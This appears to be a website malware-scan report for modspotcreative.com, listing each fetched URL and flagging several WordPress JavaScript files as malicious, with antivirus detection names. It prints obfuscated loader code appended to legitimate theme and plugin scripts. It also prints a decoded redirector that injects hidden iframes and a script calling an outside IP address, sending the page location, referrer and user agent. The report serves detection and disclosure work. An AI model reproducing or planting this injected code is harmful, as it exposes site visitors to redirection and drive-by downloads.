Request | Server response | Status |
http://modspotcreative.com/ | 200 OK Content-Length: 58053 Content-Type: text/html | clean |
http://modspotcreative.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 12559 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};var mIbYkFM=3175567; var sUAkPsk=1302948; var MFcBEnpC=18475; var jQ37c02B=537145; var OCGhllC = new Array(4997287, 4997302, 4997295, 4997284, 4997301, 4997290, 4997296, 4997295, 4997217,
... 3004 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Decoded script: function MakeFrame(){element = document.getElementById("iframe");if (!element){var el2=document.createElement("iframe");document.body.appendChild(el2);el2.id="iframe";el2.style.width="1px";el2.style.height="1px";el2.src = assa;}}function Make(){element = document.getElementById("iframe2");if (!element){var el3=document.createElement("iframe");document.body.appendChild(el3);el3.id="iframe2";el3.style.width="1px";el3.style.height="1px";el3.src=assa2;}element = document.getElementById("gogle_a
... 2009 bytes are skipped ...lc='+hghjghjhjgjh+'&ua='+ugkkjkj;var head=document.getElementsByTagName('head')[0];head.appendChild(js)} element=document.getElementById('dgllhguk');if(!element){hghjghjhjgjh=document.location;hghjhjhjg=escape(document.referrer);ugkkjkj=escape(navigator.userAgent);var js=document.createElement('script');js.id='dgllhguk';js.src='http://91.196.216.64/s.php?ref='+hghjhjhjg+'&lc='+hghjghjhjgjh+'&ua='+ugkkjkj;var head=document.getElementsByTagName('head')[0];head.appendChild(js)} Antivirus reports:- Avast
- JS:Redirector-ANO [Trj]
- Microsoft
- Trojan:JS/Redirector.IM
- NANO-Antivirus
- Trojan.Url.IframeB.bbjlro
- AVG
- JS/Downloader.Agent
- GData
- JS:Redirector-ANO
- ESET-NOD32
- JS/TrojanClicker.Iframe.NAH
|
http://modspotcreative.com/wp-content/themes/duotive-three/js/jquery.js | 200 OK Content-Length: 80973 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(t
... 3086 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0312
- Comodo
- TrojWare.JS.Agent.C
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://modspotcreative.com/wp-content/themes/duotive-three/js/jquery.scripts.js | 200 OK Content-Length: 124611 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
;(function($){$.fn.superfish=function(op){var sf=$.fn.superfish,c=sf.c,$arrow=$(['<span class="',c.arrowClass,'"> »</span>'].join('')),over=function(){var $$=$(this),menu=getMenu($$);clearTimeout(menu.sfTimer);$$.showSuperfishUl().siblings().hideSuperfishUl();},out=function(){var $$=$(this),menu=getMenu($$),o=sf.op;clearTimeout(menu.sfTimer);menu.sfTimer=setTimeout(function(){o.retainPath=($.inArray($$[0],o.$path)>-1);$$.hideSuperfishUl();if(o.$path.length&&$$.paren
... 3091 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0312
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Tencent
- Js.Trojan-downloader.Agent.Dyzq
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://modspotcreative.com/wp-content/themes/duotive-three/js/jquery.custom.js | 200 OK Content-Length: 10657 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $.noConflict();
jQuery(document).ready(function($) {
jQuery("#content div.portfolio-one-column-circle:last").addClass("portfolio-one-column-circle-last");
jQuery("#content div.portfolio-one-column-slideshow:last").addClass("portfolio-one-column-slideshow-last");
jQuery("#content div.portfolio-one-column-full:last").addClass("portfolio-one-column-full-last");
jQuery("#toptoolbar .menu-toptoolbar ul li a:last").addClass("last-child");
jQuery("#tour
... 3121 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0312
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Tencent
- Js.Trojan-downloader.Agent.Pijs
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Dos.Agent.byrwaw
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://modspotcreative.com/wp-content/plugins/user-access-manager/js/jquery.tools.min.js?ver=3.2.1 | 200 OK Content-Length: 7929 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(f){function p(a,b,c){var h=c.relative?a.position().top:a.offset().top,e=c.relative?a.position().left:a.offset().left,i=c.position[0];h-=b.outerHeight()-c.offset[0];e+=a.outerWidth()+c.offset[1];var j=b.outerHeight()+a.outerHeight();if(i=="center")h+=j/2;if(i=="bottom")h+=j;i=c.position[1];a=b.outerWidth()+a.outerWidth();if(i=="center")e-=a/2;if(i=="left")e-=a;return{top:h,left:e}}function t(a,b){var c=this,h=a.add(c),e,i=0,j=0,m=a.attr("title"),q=n[b.effect],k,r=a.is(":input"),u=r&
... 3052 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0312
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Tencent
- Js.Trojan-downloader.Agent.Pefo
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://modspotcreative.com/wp-content/plugins/user-access-manager/js/functions.js?ver=3.2.1 | 200 OK Content-Length: 3529 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function(){ if(jQuery(".uam_hide_page:checked").val() == "true"){ jQuery("#uam_page_settings").css("display","none"); jQuery(this).toggleClass("active"); } jQuery(".uam_hide_page").change(function(){ jQuery("#uam_page_settings").slideToggle("slow"); jQuery(this).toggleClass("active"); }); if(jQuery(".uam_hide_post:checked").val() == "true"){ jQuery("#uam_post_settings").css("display","none"); jQuer
... 2408 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Antiy-AVL
- Trojan[Downloader]/JS.Agent.gnk
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0312
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://modspotcreative.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 28960 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { $.fn.ajaxSubmit = function(options) { if (!this.length) { log('ajaxSubmit: skipping submit process - no element selected'); return this; } var method, action, url, $form = this; if (typeof options == 'function') { options = { success: options }; } method = this.attr('method'); action = this.attr('action'); url = (typeof action === 'string') ? $.trim(action) : ''; url = url || window.location.href || '';
... 3264 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0312
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Tencent
- Win32.Trojan-Downloader.Agent.bxty
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://modspotcreative.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.6 | 200 OK Content-Length: 8007 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) {
$(function() {
try {
if (typeof _wpcf7 == 'undefined' || _wpcf7 === null)
_wpcf7 = {};
_wpcf7 = $.extend({ cached: 0 }, _wpcf7);
$('div.wpcf7 > form').ajaxForm({
beforeSubmit: function(formData, jqForm, options) {
jqForm.wpcf7ClearResponseOutput();
jqForm.find('img.ajax-loader').css({ visibility: 'visible' });
return true;
},
beforeSerialize: function(jqForm,
... 3290 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Bkav
- MW.Clod7b4.Trojan.6674
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0312
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- ViRobot
- JS.A.Agent.8007.E
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Tencent
- Js.Trojan-downloader.Agent.Aiig
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://modspotcreative.com/wp-content/themes/duotive-three/js/duotive-slideshows/duotive-slider-gallery.js | 200 OK Content-Length: 8588 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var dtSliderGallery = new Class({
Implements: Chain,
initialize: function(options){
this.options = options;
that = this;
if (this.options.container != null) {
this.setupImages();
}
},
setupImages: function(){
slides = $$('#slider-images-wrapper a');
var images = $$('#slider-images-wrapper img');
var imagesSrc = [];
var imageAssets = [];
... 3324 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0312
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Tencent
- Js.Trojan-downloader.Agent.Pgcy
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://modspotcreative.com/wp-content/themes/duotive-three/js/get-slideshow-js.php?type=gallery&controls=1&description=1&duration=1000&interval=8000 | 200 OK Content-Length: 192 Content-Type: text/html | clean |
http://modspotcreative.com/test404page.js | 404 Not Found Content-Length: 17851 Content-Type: text/html | clean |
http://modspotcreative.com/about/ | 200 OK Content-Length: 24222 Content-Type: text/html | clean |
http://modspotcreative.com/meet-us/ | 200 OK Content-Length: 30373 Content-Type: text/html | clean |
http://modspotcreative.com/the-love/ | 200 OK Content-Length: 12697 Content-Type: text/html | clean |